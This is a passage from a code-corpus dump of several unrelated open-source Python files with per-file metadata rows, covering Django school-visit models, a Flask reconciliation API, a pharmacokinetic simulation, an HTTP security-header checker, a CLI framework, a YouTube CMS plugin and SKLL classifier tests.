user = models.OneToOneField(User, null=True, blank=True)
is_visit_1_trained = models.BooleanField(default=False)
is_visit_2_trained = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
def all_visits(self):
return Visit.objects.filter(models.Q(staff1=self) | models.Q(staff2=self)) # | models.Q(staff3=self))
@property
def name(self):
return "%s %s" % (self.first_name, self.last_name)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('last_name', 'first_name')
verbose_name_plural = "Staff"
class Student(models.Model):
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
first_name = models.CharField(max_length=255, blank=True)
last_name = models.CharField(max_length=255, blank=True)
student_id = models.CharField(max_length=255)
school = models.ForeignKey(School, related_name='students')
gender = models.CharField(max_length=255, blank=True)
racial_identity = models.CharField(max_length=255, blank=True, null=True)
classroom_teachers = models.ManyToManyField(Staff, related_name='students')
grade = models.IntegerField(null=True, blank=True)
manually_added = models.BooleanField(default=False)
is_verified = models.BooleanField(default=False)
is_custom = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
@property
def name(self):
if not self.first_name and not self.last_name:
return "Student ID: %s" % (self.student_id)
else:
return "%s %s" % (self.first_name, self.last_name)
def __unicode__(self):
return u"%s" % (self.name)
class Meta:
ordering = ('last_name', 'first_name', 'student_id', 'school')
unique_together = ('student_id', 'school')
class Visit(models.Model):
VISIT_TYPES = (
('noshow', 'No-show'),
('complete', 'Complete'),
('contact_attempt', 'Contact Attempt')
)
key = models.UUIDField(default=uuid.uuid4, unique=True, editable=False)
staff1 = models.ForeignKey(Staff, related_name='visits_as_primary')
student = models.ForeignKey(Student, blank=True, null=True, related_name='visits',)
type = models.CharField(max_length=255, choices=VISIT_TYPES)
created = models.DateTimeField(auto_now_add=True)
staff2 = models.ForeignKey(Staff, related_name='vists_as_secondary', blank=True, null=True)
date_submitted = models.DateField(blank=True, null=True)
is_submitted = models.NullBooleanField(default=False, blank=True, null=True)
answerset = models.OneToOneField(qamodels.AnswerSet)
@property
def school(self):
return self.student.school
@property
def district(self):
return self.student.school.district
def __unicode__(self):
if not self.student:
return "Unfinished visit #%d" % (self.id)
return u"%s: %s" % (self.created, self.student.name)
class Meta:
ordering = ('staff1', 'created', )
|
mit
| 2,329,072,173,996,672,500
| 34.852349
| 109
| 0.670348
| false
| 3.535407
| false
| false
| false
|
robbi5/nomenklatura
|
nomenklatura/views/reconcile.py
|
1
|
3887
|
import json
from flask import Blueprint, request, url_for
from apikit import jsonify, get_limit, get_offset
from werkzeug.exceptions import BadRequest
from nomenklatura.model import Dataset, Entity
from nomenklatura.model.matching import find_matches
section = Blueprint('reconcile', __name__)
def reconcile_index(dataset):
domain = url_for('index', _external=True).strip('/')
urlp = domain + '/entities/{{id}}'
meta = {
'name': 'nomenklatura: %s' % dataset.label,
'identifierSpace': 'http://rdf.freebase.com/ns/type.object.id',
'schemaSpace': 'http://rdf.freebase.com/ns/type.object.id',
'view': {'url': urlp},
'preview': {
'url': urlp + '?preview=true',
'width': 600,
'height': 300
},
'suggest': {
'entity': {
'service_url': domain,
'service_path': '/api/2/datasets/' + dataset.name + '/suggest'
}
},
'defaultTypes': [{'name': dataset.label, 'id': '/' + dataset.name}]
}
return jsonify(meta)
def reconcile_op(dataset, query):
try:
limit = max(1, min(100, int(query.get('limit'))))
except:
limit = 5
matches = find_matches(dataset, query.get('query', ''))
matches = matches.limit(limit)
results = []
for match in matches:
results.append({
'name': match['entity'].name,
'score': match['score'],
'type': [{
'id': '/' + dataset.name,
'name': dataset.label
}],
'id': match['entity'].id,
'uri': url_for('entities.view', id=match['entity'].id, _external=True),
'match': match['score']==100
})
return {
'result': results,
'num': len(results)
}
@section.route('/datasets/<dataset>/reconcile', methods=['GET', 'POST'])
def reconcile(dataset):
"""
Reconciliation API, emulates Google Refine API. See:
http://code.google.com/p/google-refine/wiki/ReconciliationServiceApi
"""
dataset = Dataset.by_name(dataset)
# TODO: Add proper support for types and namespacing.
data = request.args.copy()
data.update(request.form.copy())
if 'query' in data:
# single
q = data.get('query')
if q.startswith('{'):
try:
q = json.loads(q)
except ValueError:
raise BadRequest()
else:
q = data
return jsonify(reconcile_op(dataset, q))
elif 'queries' in data:
# multiple requests in one query
qs = data.get('queries')
try:
qs = json.loads(qs)
except ValueError:
raise BadRequest()
queries = {}
for k, q in qs.items():
queries[k] = reconcile_op(dataset, q)
return jsonify(queries)
else:
return reconcile_index(dataset)
@section.route('/datasets/<dataset>/suggest', methods=['GET', 'POST'])
def suggest(dataset):
"""
Suggest API, emulates Google Refine API. See:
http://code.google.com/p/google-refine/wiki/SuggestApi
"""
dataset = Dataset.by_name(dataset)
entities = Entity.all().filter(Entity.invalid != True) # noqa
query = request.args.get('prefix', '').strip()
entities = entities.filter(Entity.name.ilike('%s%%' % query))
entities = entities.offset(get_offset(field='start'))
entities = entities.limit(get_limit(default=20))
matches = []
for entity in entities:
matches.append({
'name': entity.name,
'n:type': {
'id': '/' + dataset.name,
'name': dataset.label
},
'id': entity.id
})
return jsonify({
"code": "/api/status/ok",
"status": "200 OK",
"prefix": query,
"result": matches
})
|
mit
| -4,379,057,662,769,576,400
| 28.671756
| 83
| 0.545408
| false
| 3.848515
| false
| false
| false
|
james-nichols/dtrw
|
compartment_models/PBPK_test.py
|
1
|
5547
|
#!/usr/local/bin/python3
# Libraries are in parent directory
import sys
sys.path.append('../')
import math
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
import pdb
from dtrw import *
class DTRW_PBPK(DTRW_compartment):
def __init__(self, X_inits, T, dT, V, Q, R, mu, Vmax, Km, g, g_T):
if len(X_inits) != 6:
# Error!
print("Need six initial points")
raise SystemExit
super(DTRW_PBPK, self).__init__(X_inits, T, dT)
self.Vs = np.array(V)
self.Qs = np.array(Q)
self.Rs = np.array(R)
self.mu = mu
self.Vmax = Vmax
self.Km = Km
self.g = g
self.g_T = g_T
def creation_flux(self, n):
g_N = 0.
if (n * self.dT < self.g_T):
g_N = self.g * self.dT
creation = np.zeros(self.n_species)
creation[:-1] = self.removal_flux_markovian(n)[5,:]
creation[-1] = (self.removal_flux_markovian(n)[:5, 0]).sum() + g_N
return creation
"""return np.array([(1. - np.exp(-self.dT * self.Qs[0] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[1] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[2] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[3] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[4] / self.Vs[5])) * self.Xs[5,n], \
(1. - np.exp(-self.dT * self.Qs[0] / (self.Vs[0] * self.Rs[0]))) * self.Xs[0,n] + \
(1. - np.exp(-self.dT * self.Qs[1] / (self.Vs[1] * self.Rs[1]))) * self.Xs[1,n] + \
(1. - np.exp(-self.dT * self.Qs[2] / (self.Vs[2] * self.Rs[2]))) * self.Xs[2,n] + \
(1. - np.exp(-self.dT * self.Qs[3] / (self.Vs[3] * self.Rs[3]))) * self.Xs[3,n] + \
(1. - np.exp(-self.dT * self.Qs[4] / (self.Vs[4] * self.Rs[4]))) * self.Xs[4,n] + \
g_N ])"""
def removal_rates(self, n):
rates = np.zeros([self.n_species, 5])
rates[:-1, 0] = self.Qs / (self.Vs[:-1] * self.Rs)
rates[3, 1] = self.mu / self.Vs[3]
rates[4, 1] = self.Vmax / (self.Vs[4] * self.Km + self.Xs[4,n])
rates[5,:] = self.Qs / self.Vs[-1]
return rates
class DTRW_PBPK_anom(DTRW_compartment):
def __init__(self, X_inits, T, dT, V, Q, R, mu, Vmax, Km, g, g_T, alpha):
if len(X_inits) != 6:
# Error!
print("Need six initial points")
raise SystemExit
super(DTRW_PBPK_anom, self).__init__(X_inits, T, dT)
self.Vs = np.array(V)
self.Qs = np.array(Q)
self.Rs = np.array(R)
self.mu = mu
self.Vmax = Vmax
self.Km = Km
self.g = g
self.g_T = g_T
self.alpha = alpha
self.Ks[2] = calc_sibuya_kernel(self.N+1, self.alpha)
self.Ks[5] = calc_sibuya_kernel(self.N+1, self.alpha)
self.anom_rates = [None] * self.n_species
self.anom_rates[2] = self.Qs[2] / (self.Vs[2] * self.Rs[2])
self.anom_rates[5] = self.Qs[2] / (self.Vs[-1])
def creation_flux(self, n):
g_N = 0.
if (n * self.dT < self.g_T):
g_N = self.g * self.dT
creation = np.zeros(self.n_species)
creation[:-1] = self.removal_flux_markovian(n)[5,:]
creation[2] = self.removal_flux_anomalous(n)[5]
creation[-1] = (self.removal_flux_markovian(n)[:5, 0]).sum() + self.removal_flux_anomalous(n)[2] + g_N
return creation
def removal_rates(self, n):
rates = np.zeros([self.n_species, 5])
rates[:-1, 0] = self.Qs / (self.Vs[:-1] * self.Rs)
rates[2,0] = 0.
rates[3, 1] = self.mu / self.Vs[3]
rates[4, 1] = self.Vmax / (self.Vs[4] * self.Km + self.Xs[4,n])
rates[5,:] = self.Qs / self.Vs[-1]
rates[5,2] = 0.
return rates
T = 100.0
dT = 0.01
ts = np.arange(0., T, dT)
initial = [0., 0., 0., 0., 0., 0.]
mu = 0.5 # Kidney removal rate
V_max = 2.69
K_m = 0.59
# [P, R, F, K, L, A]
Vs = [28.6, 6.90, 15.10, 0.267, 1.508, 1.570]
Qs = [1.46, 1.43, 0.29, 1.14, 1.52]
Rs = [0.69, 0.79, 0.39, 0.80, 0.78]
alpha = 0.8
g = 1.0
g_T = 1.0
dtrw = DTRW_PBPK(initial, T, dT, Vs, Qs, Rs, mu, V_max, K_m, g, g_T)
dtrw_anom = DTRW_PBPK_anom(initial, T, dT, Vs, Qs, Rs, mu, V_max, K_m, g, g_T, alpha)
dtrw.solve_all_steps()
dtrw_anom.solve_all_steps()
max_level = max([dtrw.Xs[0,:].max(), dtrw.Xs[1,:].max(), dtrw.Xs[2,:].max(), dtrw.Xs[3,:].max(), dtrw.Xs[4,:].max(), dtrw.Xs[5,:].max()])
fig = plt.figure(figsize=(8,8))
plt.xlim(0,T)
plt.ylim(0,1.1 * max_level)
plt.xlabel('Time')
P, = plt.plot(ts, dtrw.Xs[0,:])
R, = plt.plot(ts, dtrw.Xs[1,:])
F, = plt.plot(ts, dtrw.Xs[2,:])
K, = plt.plot(ts, dtrw.Xs[3,:])
L, = plt.plot(ts, dtrw.Xs[4,:])
A, = plt.plot(ts, dtrw.Xs[5,:])
plt.legend([P, R, F, K, L, A], ["Poorly perfused", "Richly perfused", "Fatty tissue", "Kidneys", "Liver", "Arterial blood"])
Pa, = plt.plot(ts, dtrw_anom.Xs[0,:],'b:')
Ra, = plt.plot(ts, dtrw_anom.Xs[1,:],'g:')
Fa, = plt.plot(ts, dtrw_anom.Xs[2,:],'r:')
Ka, = plt.plot(ts, dtrw_anom.Xs[3,:],'c:')
La, = plt.plot(ts, dtrw_anom.Xs[4,:],'m:')
Aa, = plt.plot(ts, dtrw_anom.Xs[5,:],'y:')
plt.show()
T, = plt.plot(ts, dtrw.Xs.sum(0), 'k')
Ta, = plt.plot(ts, dtrw_anom.Xs.sum(0), 'k:')
plt.show()
|
gpl-2.0
| 154,471,276,779,151,000
| 31.822485
| 137
| 0.491437
| false
| 2.346447
| false
| false
| false
|
secopsconsult/websitechecks
|
securityheaders.py
|
1
|
2724
|
#!/usr/bin/env python
'''
Script to check for the presence of Security headers and rate the site
More info:
https://securityheaders.io/
'''
import optparse
import mechanize
import tkinter
def validateHeaders(header, debug):
if (debug):
print "[+] Validating headers"
print "[~] Headers: " + str(header)
if (debug):
if (len(header.getheaders('Public-Key-Pins')) > 0):
print "[+] HPKP Header: Header not Empty"
if (len(header.getheaders('Public-Key-Pins')) > 0):
print "[+] HPKP Header: " + str(header.getheaders('Public-Key-Pins')[0])
else:
print "[~] No HPKP Header present"
if (debug):
if (len(header.getheaders('Content-Security-Policy')) > 0):
print "[+] CSP Header: Header not Empty"
if (len(header.getheaders('Content-Security-Policy')) > 0):
print "[+] CSP Header: " + str(header.getheaders('Content-Security-Policy')[0])
else:
print "[~] No CSP Header present"
if (debug):
if (len(header.getheaders('Strict-Transport-Security')) > 0):
print "[+] HSTS Header: Header not Empty"
if (len(header.getheaders('Strict-Transport-Security')) > 0):
print "[+] HSTS Header: " + str(header.getheaders('Strict-Transport-Security')[0])
else:
print "[-] No HSTS Header present"
return
def viewPage(url, agent, debug):
if ((url.startswith("http://") == False) and (url.startswith("https://") == False)):
url = "https://" + url
if (debug):
print "[+] Browsing : " +url.strip() +" As " + agent.strip()
browser = mechanize.Browser()
browser.set_handle_robots(False)
browser.addheaders = [('User-agent',agent)]
browser.addheaders = [('Accept','test/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
browser.set_handle_refresh(False)
try:
page = browser.open(url.strip())
if (debug):
print "[+] Response Code: " +str(page.code)
return page.info()
finally:
return page.info()
def main():
# Options for the script
parser = optparse.OptionParser('Usage %prog% ' + " -u <url> -a <agent>")
parser.add_option('-u', dest='url', type='string', help='Specify the URL')
parser.add_option('-a', dest='agent', type='string', help='Specify the user agent')
parser.add_option('-d', dest='debug', action="store_true", default=False, help='Debug Mode')
(options, args) = parser.parse_args()
if (options.url == None):
print parser.usage
exit(0)
if (options.agent == None):
if (options.debug):
print "[-] No Useragent Set. Defaulting to Mozilla"
options.agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"
header = viewPage(options.url, options.agent, options.debug)
validateHeaders(header, options.debug)
if __name__ == '__main__':
main()
|
mit
| -1,188,025,213,629,344,800
| 27.673684
| 100
| 0.647577
| false
| 3
| false
| false
| false
|
lukaszb/monolith
|
monolith/cli/base.py
|
1
|
10479
|
import os
import sys
import argparse
from collections import namedtuple
from monolith.compat import OrderedDict
from monolith.compat import unicode
from monolith.cli.exceptions import AlreadyRegistered
from monolith.cli.exceptions import CommandError
from monolith.utils.imports import get_class
Argument = namedtuple('Argument', 'args kwargs')
def arg(*args, **kwargs):
"""
Returns *Argument* namedtuple in format: ``(args, kwargs)``. In example::
>>> arg(1, 2, 'foo', 'bar')
Argument(args=(1, 2, 'foo', 'bar'), kwargs={})
>>> arg('a', 1, foo='bar')
Argument(args=('a', 1), kwargs={'foo': 'bar'})
"""
return Argument(args, kwargs)
class Parser(argparse.ArgumentParser):
"""
Subclass of ``argparse.ArgumentParser`` providing more control over output
stream.
"""
def __init__(self, *args, **kwargs):
self.stream = kwargs.pop('stream', sys.stderr)
super(Parser, self).__init__(*args, **kwargs)
def _print_message(self, message, file=None):
if file is None:
file = self.stream
super(Parser, self)._print_message(unicode(message), file)
class ExecutionManager(object):
usage = None
completion = False
completion_env_var_name = ''
parser_cls = Parser
def __init__(self, argv=None, stderr=None, stdout=None):
if argv is None:
argv = [a for a in sys.argv]
self.prog_name = os.path.basename(argv[0])
self.argv = argv[1:]
self.registry = {}
self.stderr = stderr or sys.stderr
self.stdout = stdout or sys.stdout
for name, Command in self.get_commands_to_register().items():
self.register(name, Command)
def get_usage(self):
"""
Returns *usage* text of the main application parser.
"""
return self.usage
def get_parser(self):
"""
Returns :class:`monolith.cli.Parser` instance for this
*ExecutionManager*.
"""
parser = self.parser_cls(prog=self.prog_name, usage=self.get_usage(),
stream=self.stderr)
subparsers = parser.add_subparsers(
title='subcommands',
)
for name, command in self.registry.items():
cmdparser = subparsers.add_parser(name, help=command.help)
for argument in command.get_args():
cmdparser.add_argument(*argument.args, **argument.kwargs)
command.setup_parser(parser, cmdparser)
cmdparser.set_defaults(func=command.handle)
return parser
def register(self, name, Command, force=False):
"""
Registers given ``Command`` (as given ``name``) at this
*ExecutionManager*'s registry.
:param name: name in the registry under which given ``Command``
should be stored.
:param Command: should be subclass of
:class:``monolith.cli.base.BaseCommand``
:param force: Forces registration if set to ``True`` - even if another
command was already registered, it would be overridden and no
execption would be raised. Defaults to ``False``.
:raises AlreadyRegistered: If another command was already registered
under given ``name``.
"""
if not force and name in self.registry:
raise AlreadyRegistered('Command %r is already registered' % name)
command = Command(self.prog_name, self.stdout)
command.manager = self
self.registry[name] = command
command.post_register(self)
def get_commands(self):
"""
Returns commands stored in the registry (sorted by name).
"""
commands = OrderedDict()
for cmd in sorted(self.registry.keys()):
commands[cmd] = self.registry[cmd]
return commands
def get_commands_to_register(self):
"""
Returns dictionary (*name* / *Command* or string pointing at the
command class.
"""
return {}
def call_command(self, cmd, *argv):
"""
Runs a command.
:param cmd: command to run (key at the registry)
:param argv: arguments that would be passed to the command
"""
parser = self.get_parser()
args = [cmd] + list(argv)
namespace = parser.parse_args(args)
self.run_command(namespace)
def execute(self, argv=None):
"""
Executes command based on given arguments.
"""
if self.completion:
self.autocomplete()
parser = self.get_parser()
namespace = parser.parse_args(argv)
if hasattr(namespace, 'func'):
self.run_command(namespace)
def run_command(self, namespace):
try:
namespace.func(namespace)
except CommandError as err:
sys.stderr.write('ERROR: %s\n' % err.message)
sys.exit(err.code)
def autocomplete(self):
"""
If *completion* is enabled, this method would write to ``self.stdout``
completion words separated with space.
"""
if self.completion_env_var_name not in os.environ:
return
cwords = os.environ['COMP_WORDS'].split()[1:]
cword = int(os.environ['COMP_CWORD'])
try:
current = cwords[cword-1]
except IndexError:
current = ''
cmd_names = self.get_commands().keys()
if current:
self.stdout.write(unicode(' '.join(
[name for name in cmd_names if name.startswith(current)])))
sys.exit(1)
class SimpleExecutionManager(ExecutionManager):
def __init__(self, program, commands):
"""
:param program: name of the program under which commands would be
executed (usually name of the program).
:param commands: dictionary mapping subcommands to proper command
classes. Values can be string - in that case proper command class
would be importer and used. Example::
{
'subcommand1': SomeCommand,
'subcommand2': 'myprogram.commands.another.AnotherCommand',
}
"""
self.simple_commands = commands
super(SimpleExecutionManager, self).__init__([program])
def get_commands_to_register(self):
"""
Returns dictionary with commands given during construction. If value is
a string, it would be converted into proper class pointer.
"""
return dict((key, get_class(value)) for key, value in
self.simple_commands.items())
class BaseCommand(object):
"""
Base command class that should be subclassed by concrete commands.
**Attributes**
- ``help``: Help description for this command. Defaults to empty string.
- ``args``: List of :class:`Argument` instances. Defaults to empty list.
- ``prog_name``: Program name of *ExecutionManager* within which this
command is run. Defaults to ``None``.
- ``stdout``: File-like object. Command should write to it. Defaults to
``sys.stdout``.
"""
help = ''
args = []
def __init__(self, prog_name=None, stdout=None):
self.prog_name = prog_name or ''
self.stdout = stdout or sys.stdout
def get_args(self):
"""
Returns list of :class:`Argument` instances for the parser. By default,
it returns ``self.args``.
"""
return self.args or []
def setup_parser(self, parser, cmdparser):
"""
This would be called when command is registered by ExecutionManager
after arguments from ``get_args`` are processed.
Default implementation does nothing.
:param parser: Global argparser.ArgumentParser
:param cmdparser: Subparser related with this command
"""
def handle(self, namespace):
"""
Handles given ``namespace`` and executes command. Should be overridden
at subclass.
"""
raise NotImplementedError
def post_register(self, manager):
"""
Performs actions once this command is registered within given
``manager``. By default it does nothing.
"""
pass
class LabelCommand(BaseCommand):
"""
Command that works on given position arguments (*labels*). By default, at
least one *label* is required. This is controlled by *labels_required*
attribute.
**Extra attributes**:
- ``labels_required``: If ``True``, at least one *label* is required,
otherwise no positional arguments could be given. Defaults to ``True``.
"""
labels_required = True
def get_labels_arg(self):
"""
Returns argument for *labels*.
"""
nargs = self.labels_required and '+' or '*'
return arg('labels', nargs=nargs)
def get_args(self):
return self.args + [self.get_labels_arg()]
def handle(self, namespace):
"""
Handles given ``namespace`` by calling ``handle_label`` method
for each given *label*.
"""
for label in namespace.labels:
self.handle_label(label, namespace)
else:
self.handle_no_labels(namespace)
def handle_label(self, label, namespace):
"""
Handles single *label*. Should be overridden at subclass.
"""
raise NotImplementedError
def handle_no_labels(self, namespace):
"""
Performs some action if no *lables* were given. By default it does
nothing.
"""
pass
class SingleLabelCommand(BaseCommand):
"""
Command that works on given positional argument (*label*).
**Extra arguments**:
- ``label_default_value``: If no *label* were given, this would be default
value that would be passed to ``namespace``. Defaults to ``None``.
"""
label_default_value = None
def get_label_arg(self):
"""
Returns argument for *label*.
"""
return arg('label', default=self.label_default_value, nargs='?')
def get_args(self):
return self.args + [self.get_label_arg()]
def handle(self, namespace):
"""
Calls ``handle_label`` method for given *label*.
"""
self.handle_label(namespace.label, namespace)
def handle_label(self, label, namespace):
"""
Handles *label*. Should be overridden at subclass.
"""
raise NotImplementedError
|
bsd-2-clause
| -1,535,403,399,572,830,500
| 30.280597
| 79
| 0.597958
| false
| 4.436494
| false
| false
| false
|
jbazik/cmsplugin-video-youtube
|
cmsplugin_video_youtube/cms_plugins.py
|
1
|
1467
|
from django.utils.translation import ugettext as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cmsplugin_video_youtube.models import YouTubeVideo
from cmsplugin_video_youtube.forms import YouTubeVideoForm
class YouTubeVideoPlugin(CMSPluginBase):
model = YouTubeVideo
name = _("YouTubeVideo")
render_template = "cmsplugin_video_youtube/embed.html"
form = YouTubeVideoForm
text_enabled = True
fieldsets = (
(None, {
'fields': ('name', 'video_id', 'width', 'height'),
}),
('Advanced Options', {
'classes': ('collapse',),
'fields': (
'fullscreen',
'autohide',
'autoplay',
'color',
'controls',
'iv_load',
'loop',
'modestbranding',
'playlist',
'related',
'showinfo',
'start',
'theme',
),
}),
)
def render(self, context, instance, placeholder):
context.update({
'object': instance,
'placeholder': placeholder
})
return context
def icon_src(self, instance):
return u"http://img.youtube.com/vi/%s/default.jpg" % instance.video_id
def icon_alt(self, instance):
return u"%s" % instance
plugin_pool.register_plugin(YouTubeVideoPlugin)
|
lgpl-3.0
| 6,135,923,229,854,246,000
| 26.166667
| 78
| 0.537151
| false
| 4.445455
| false
| false
| false
|
ernfrid/skll
|
tests/test_classification.py
|
1
|
12834
|
# License: BSD 3 clause
"""
Tests related to classification experiments.
:author: Michael Heilman (mheilman@ets.org)
:author: Nitin Madnani (nmadnani@ets.org)
:author: Dan Blanchard (dblanchard@ets.org)
:author: Aoife Cahill (acahill@ets.org)
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import csv
import glob
import itertools
import json
import os
from io import open
from os.path import abspath, dirname, exists, join
import numpy as np
from nose.tools import eq_, assert_almost_equal, raises
from sklearn.base import RegressorMixin
from skll.data import FeatureSet
from skll.data.writers import NDJWriter
from skll.config import _parse_config_file
from skll.experiments import run_configuration
from skll.learner import Learner
from skll.learner import _DEFAULT_PARAM_GRIDS
from utils import (make_classification_data, make_regression_data,
make_sparse_data, fill_in_config_paths_for_single_file)
_ALL_MODELS = list(_DEFAULT_PARAM_GRIDS.keys())
_my_dir = abspath(dirname(__file__))
def setup():
train_dir = join(_my_dir, 'train')
if not exists(train_dir):
os.makedirs(train_dir)
test_dir = join(_my_dir, 'test')
if not exists(test_dir):
os.makedirs(test_dir)
output_dir = join(_my_dir, 'output')
if not exists(output_dir):
os.makedirs(output_dir)
def tearDown():
train_dir = join(_my_dir, 'train')
test_dir = join(_my_dir, 'test')
output_dir = join(_my_dir, 'output')
config_dir = join(_my_dir, 'configs')
if exists(join(train_dir, 'train_single_file.jsonlines')):
os.unlink(join(train_dir, 'train_single_file.jsonlines'))
if exists(join(test_dir, 'test_single_file.jsonlines')):
os.unlink(join(test_dir, 'test_single_file.jsonlines'))
if exists(join(output_dir, 'rare_class.predictions')):
os.unlink(join(output_dir, 'rare_class.predictions'))
for output_file in glob.glob(join(output_dir, 'train_test_single_file_*')):
os.unlink(output_file)
config_file = join(config_dir, 'test_single_file.cfg')
if exists(config_file):
os.unlink(config_file)
def check_predict(model, use_feature_hashing=False):
"""
This tests whether predict task runs and generates the same
number of predictions as samples in the test set. The specified
model indicates whether to generate random regression
or classification data.
"""
# create the random data for the given model
if issubclass(model, RegressorMixin):
train_fs, test_fs, _ = \
make_regression_data(use_feature_hashing=use_feature_hashing,
feature_bins=5)
# feature hashing will not work for Naive Bayes since it requires
# non-negative feature values
elif model.__name__ == 'MultinomialNB':
train_fs, test_fs = \
make_classification_data(use_feature_hashing=False,
non_negative=True)
else:
train_fs, test_fs = \
make_classification_data(use_feature_hashing=use_feature_hashing,
feature_bins=25)
# create the learner with the specified model
learner = Learner(model.__name__)
# now train the learner on the training data and use feature hashing when
# specified and when we are not using a Naive Bayes model
learner.train(train_fs, grid_search=False)
# now make predictions on the test set
predictions = learner.predict(test_fs)
# make sure we have the same number of outputs as the
# number of test set samples
eq_(len(predictions), test_fs.features.shape[0])
# the runner function for the prediction tests
def test_predict():
for model, use_feature_hashing in \
itertools.product(_ALL_MODELS, [True, False]):
yield check_predict, model, use_feature_hashing
# the function to create data with rare labels for cross-validation
def make_rare_class_data():
"""
We want to create data that has five instances per class, for three labels
and for each instance within the group of 5, there's only a single feature
firing
"""
ids = ['EXAMPLE_{}'.format(n) for n in range(1, 16)]
y = [0] * 5 + [1] * 5 + [2] * 5
X = np.vstack([np.identity(5), np.identity(5), np.identity(5)])
feature_names = ['f{}'.format(i) for i in range(1, 6)]
features = []
for row in X:
features.append(dict(zip(feature_names, row)))
return FeatureSet('rare-class', ids, features=features, labels=y)
def test_rare_class():
"""
Test cross-validation when some labels are very rare
"""
rare_class_fs = make_rare_class_data()
prediction_prefix = join(_my_dir, 'output', 'rare_class')
learner = Learner('LogisticRegression')
learner.cross_validate(rare_class_fs,
grid_objective='unweighted_kappa',
prediction_prefix=prediction_prefix)
with open(prediction_prefix + '.predictions', 'r') as f:
reader = csv.reader(f, dialect='excel-tab')
next(reader)
pred = [row[1] for row in reader]
eq_(len(pred), 15)
def check_sparse_predict(learner_name, expected_score, use_feature_hashing=False):
train_fs, test_fs = make_sparse_data(
use_feature_hashing=use_feature_hashing)
# train a logistic regression classifier on the training
# data and evalute on the testing data
learner = Learner(learner_name)
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
assert_almost_equal(test_score, expected_score)
def test_sparse_predict():
for learner_name, expected_scores in zip(['LogisticRegression',
'DecisionTreeClassifier',
'RandomForestClassifier',
'AdaBoostClassifier',
'MultinomialNB',
'KNeighborsClassifier'],
[(0.45, 0.51), (0.5, 0.51),
(0.46, 0.46), (0.5, 0.5),
(0.44, 0), (0.51, 0.43)]):
yield check_sparse_predict, learner_name, expected_scores[0], False
if learner_name != 'MultinomialNB':
yield check_sparse_predict, learner_name, expected_scores[1], True
def check_sparse_predict_sampler(use_feature_hashing=False):
train_fs, test_fs = make_sparse_data(
use_feature_hashing=use_feature_hashing)
if use_feature_hashing:
sampler = 'RBFSampler'
sampler_parameters = {"gamma": 1.0, "n_components": 50}
else:
sampler = 'Nystroem'
sampler_parameters = {"gamma": 1.0, "n_components": 50,
"kernel": 'rbf'}
learner = Learner('LogisticRegression',
sampler=sampler,
sampler_kwargs=sampler_parameters)
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
expected_score = 0.44 if use_feature_hashing else 0.48999999999999999
assert_almost_equal(test_score, expected_score)
def test_sparse_predict_sampler():
yield check_sparse_predict_sampler, False
yield check_sparse_predict_sampler, True
def make_single_file_featureset_data():
"""
Write a training file and a test file for tests that check whether
specifying train_file and test_file actually works.
"""
train_fs, test_fs = make_classification_data(num_examples=600,
train_test_ratio=0.8,
num_labels=2,
num_features=3,
non_negative=False)
# Write training feature set to a file
train_path = join(_my_dir, 'train', 'train_single_file.jsonlines')
writer = NDJWriter(train_path, train_fs)
writer.write()
# Write test feature set to a file
test_path = join(_my_dir, 'test', 'test_single_file.jsonlines')
writer = NDJWriter(test_path, test_fs)
writer.write()
def test_train_file_test_file():
"""
Test that train_file and test_file experiments work
"""
# Create data files
make_single_file_featureset_data()
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'))
run_configuration(config_path, quiet=True)
# Check results
with open(join(_my_dir, 'output', ('train_test_single_file_train_train_'
'single_file.jsonlines_test_test_single'
'_file.jsonlines_RandomForestClassifier'
'.results.json'))) as f:
result_dict = json.load(f)[0]
assert_almost_equal(result_dict['score'], 0.925)
@raises(ValueError)
def test_train_file_and_train_directory():
"""
Test that train_file + train_directory = ValueError
"""
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'),
train_directory='foo')
_parse_config_file(config_path)
@raises(ValueError)
def test_test_file_and_test_directory():
"""
Test that test_file + test_directory = ValueError
"""
# Run experiment
config_path = fill_in_config_paths_for_single_file(join(_my_dir, "configs",
"test_single_file"
".template.cfg"),
join(_my_dir, 'train',
'train_single_file'
'.jsonlines'),
join(_my_dir, 'test',
'test_single_file.'
'jsonlines'),
test_directory='foo')
_parse_config_file(config_path)
def check_adaboost_predict(base_estimator, algorithm, expected_score):
train_fs, test_fs = make_sparse_data()
# train an AdaBoostClassifier on the training data and evalute on the
# testing data
learner = Learner('AdaBoostClassifier', model_kwargs={'base_estimator': base_estimator,
'algorithm': algorithm})
learner.train(train_fs, grid_search=False)
test_score = learner.evaluate(test_fs)[1]
assert_almost_equal(test_score, expected_score)
def test_adaboost_predict():
for base_estimator_name, algorithm, expected_score in zip(['MultinomialNB',
'DecisionTreeClassifier',
'SGDClassifier',
'SVC'],
['SAMME.R', 'SAMME.R',
'SAMME', 'SAMME'],
[0.45, 0.5, 0.45, 0.43]):
yield check_adaboost_predict, base_estimator_name, algorithm, expected_score
|
bsd-3-clause
| 3,986,852,876,339,038,700
| 38.489231
| 91
| 0.52883
| false
| 4.3154
| true
| false
| false
|
mikhtonyuk/rxpython
|
concurrent/futures/cooperative/ensure_exception_handled.py
|
1
|
3261
|
import traceback
